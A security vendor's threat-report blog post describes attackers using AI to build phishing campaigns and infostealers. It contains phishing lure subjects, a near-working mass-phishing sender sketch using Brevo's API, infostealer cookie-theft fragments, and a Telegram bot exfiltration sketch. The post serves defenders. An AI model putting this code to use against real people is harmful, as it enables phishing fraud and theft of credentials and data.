Security operations · 3 MIN READ · AARON WALTON · JUL 23, 2024 · TAGS: AI / MDR
TL;DR
This is a summary of what you’ll find in each blog in this series:
- Volume I: Q2 by the numbers. We’ll look at an overview of incidents and which attack types are trending. This volume serves as a summary of the whole quarter.
- ➡️ Volume II: Attackers advance with AI. In many cases, attackers use AI in place of the skills they don’t have or to augment their existing capabilities. We share examples and insights from attacks we’ve seen against our own customer base.
- Volume III: Malware infection trends. We discuss what types of malware appear to be trending (spoiler alert: it’s Remote Access Trojans [RATs]) and long-time threats that don’t appear to be going away anytime soon.
- Volume IV: Phishing trends. Phishing-as-a-Service (PhaaS) platforms make phishing easy. These services really took off in the last year and a half and show no sign of stopping. We share what these are, how they work, and how they can be counteracted.
- Volume V: Latent-risk infostealing malware. Infostealers present a serious risk to businesses. We examine recent notable breaches involving infostealers, highlighting the importance of being able to detect, mitigate, and respond to this form of malware.
Since easily accessible AI tools were introduced last year, their widespread adoption has left many people, both in and outside the cybersecurity community, concerned about the security implications. In February, Microsoft and OpenAI published findings on nation-state-aligned actors using AI to advance toward their goals. However, we haven’t seen much discussion of how cybercriminals actually use AI beyond theoretical examples. This quarter, we started seeing more concrete examples of cybercriminals leveraging AI for phishing and information-stealing malware.
Here are some noteworthy examples.
AI-aided phishing
In June, we wrote about an instance where an attacker appeared to leverage an AI-written script to run their phishing campaign. The (seemingly inexperienced) attacker accidentally attached the script itself to phishing emails instead of the intended phishing attachment. From our review, we believe the script was AI-generated because its coding style and comment frequency were consistent with other AI-generated code samples.
The script, while fairly simple, was effective. It was built to leverage Brevo’s (formerly Sendinblue) API to send emails. The only input required from the user was a list of email addresses. For each address, the script extracted the recipient’s domain and inserted it into the subject line along with random numbers. While none of this is particularly sophisticated, small touches like these make phishing emails more targeted and harder for defenders to automatically identify and remove.
subjects = [
    "[DOMC]: ACH Deposit Completed for your Invoice – 29,300USD",
    "[DOMC]: Notification of EFT Remittance",
    "[DOMC]: EFT Payment Advice",
    "[DOMC]: Payment Notification from vendor",
    "[DOMC]: ACH Payment Advice Note 05/16 -",
    "[DOMC]: Remittance Advice attached – ID"
]
# Preset name for the attachment
preset_attachment_name = "Remittance_DOMC.html"
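To illustrate how little code this takes, here’s a minimal sketch of the technique, not the attacker’s actual script. It assumes [DOMC] is the placeholder the script swaps for the recipient’s domain, and it uses hypothetical values for the API key, sender, and recipient list; the endpoint shown is Brevo’s v3 transactional email API.

import random
import requests

API_KEY = "REDACTED"  # hypothetical; a real campaign embeds a working Brevo API key
recipients = ["ap@victimcorp.com"]  # hypothetical recipient list supplied by the attacker

for address in recipients:
    # Extract the recipient's domain (e.g., VICTIMCORP) to personalize the subject
    domain = address.split("@")[1].split(".")[0].upper()
    subject = random.choice(subjects).replace("DOMC", domain) + f" {random.randint(1000, 9999)}"
    requests.post(
        "https://api.brevo.com/v3/smtp/email",
        headers={"api-key": API_KEY},
        json={
            "sender": {"email": "billing@spoofed-vendor.example"},  # hypothetical sender
            "to": [{"email": address}],
            "subject": subject,
            "htmlContent": "<html>…</html>",  # phishing body elided
            # a real campaign would also set the attachment field here
        },
    )

Nothing in a script like this requires real expertise, which is exactly the gap AI fills for less-skilled attackers.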
AI-aided infostealers
Attackers are also leveraging AI to generate infostealing malware. In one instance, our SOC team saw a bad actor use an executable file to drop a copy of Python and a Python script. The writing style and language in some sections of the script differ substantially from the rest, indicating the malware developer likely used AI to write those portions. (In the AI-generated portions, the code consistently follows the PEP 8 style guide for Python and includes comments, while the rest of the code does not.)
The AI-generated portions of the code identify where installed browsers are located and load the databases containing passwords, cookies, and credit card numbers (i.e., the main infostealing capability of the malware). The attacker supplied their own code for decrypting that content, then leveraged AI to write the exfiltration routine, which sends the stolen data through Telegram’s API.
The malware appears to have been written by a Vietnamese developer, and the code contains AI-generated comments in both Vietnamese and English. Like other information-stealing malware from Vietnam, it specifically looks for Facebook Business accounts and excludes targets based in Vietnam. If a victim is in Vietnam, the malware only sends the attacker a Telegram message saying: “Tool is blocked in Vietnam!” (“Tool bị chặn tại Việt Nam!” in Vietnamese).
def base_firefox_getCookies(path, cookies_file='cookies.sqlite'):
    path_cookies = os.path.join(path, cookies_file)
    # Check if file exist
    if not os.path.exists(path_cookies):
        conn = sqlite3.connect(path_cookies)
        cursor = conn.cursor()
        […]
# Định nghĩa các biến tương ứng ("Define the corresponding variables")
default_appdata = os.path.expandvars("%APPDATA%")
local_appdata = os.path.expandvars("%LOCALAPPDATA%")
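For reference, the Telegram channel requires almost no code either. Here’s a minimal sketch, with a hypothetical bot token and chat ID rather than values from the sample, of how the geofence notification described above could be sent via Telegram’s Bot API:

import requests

BOT_TOKEN = "0000000000:REDACTED"  # hypothetical; real samples embed the attacker's bot token
CHAT_ID = "-1000000000000"         # hypothetical attacker-controlled chat

def send_message(text):
    # Telegram Bot API sendMessage: posts text into the attacker's chat
    requests.post(
        f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage",
        json={"chat_id": CHAT_ID, "text": text},
    )

send_message("Tool is blocked in Vietnam!")  # notification sent when a victim is geofenced out

Stolen data rides the same channel (via endpoints like sendDocument), which is one reason outbound api.telegram.org traffic from unexpected hosts is a signal worth investigating.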
The examples outlined here are important because they highlight that attackers are using AI to generate code and programs in ways similar to defenders—offering a behind-the-scenes look at attacker behavior we don’t often get on the defender side.
Next up in this series: malware trends.
Questions? Just want to chat? Drop us a line.
About these reports
The trends described in our quarterly threat reports (QTRs) are based on incidents our security operations center (SOC) identified through investigations into alerts, email submissions, or threat hunting leads in the second quarter (Q2) of 2024. We analyzed incidents across our customer base, which includes organizations of all sizes, in many industries, and with differing security maturity levels. In the process, we sought patterns and attacker tendencies to help guide strategic decision-making and operational processes for your team.